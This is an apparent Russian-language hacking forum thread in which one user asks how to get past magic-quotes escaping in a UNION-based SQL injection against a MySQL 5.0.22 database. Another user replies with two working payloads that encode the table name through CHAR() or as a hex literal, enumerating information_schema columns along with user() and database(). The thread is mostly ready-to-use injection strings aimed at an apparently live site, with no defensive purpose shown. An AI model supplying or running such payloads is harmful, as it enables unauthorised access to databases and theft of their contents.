Версия
5.0.22-log

Нужно обойти кавычку...

=====
При построении запроса:

+union+select+1,column_name,3,4,5,6,7,8,user(),10, database(),12,13+from+information_schema.columns+w here+table_name='USER_PRIVILEGES'+limit+1,1/*

=====
Мускул выдает, что:

<...> '\'USER_PRIVILEGES\' limit 1,1/*' at line 1

Мэджик квотес судя по всему включены... Обойти как-то можно?

ЗЫ. Пробовал перевести в хекс - не получилось.

Что значит не получилось в хекс перевести?

переверсти в хекс получилось, результат запроса не изменился

Надеюсь ты ковычки тоже в хекс не переводил...

вот тебе два варианта:
+union+select+1,column_name,3,4,5,6,7,8,user(),10, database(),12,13+from+information_schema.columns+w here+table_name=CHAR(85,83,69,82,95,80,82,73,86,73 ,76,69,71,69,83)+limit+1,1/*

+union+select+1,column_name,3,4,5,6,7,8,user(),10, database(),12,13+from+information_schema.columns+w here+table_name=0x555345525F50524956494C45474553+l imit+1,1/*

йа дибилко. забыл про char().. всем огромное спасибо.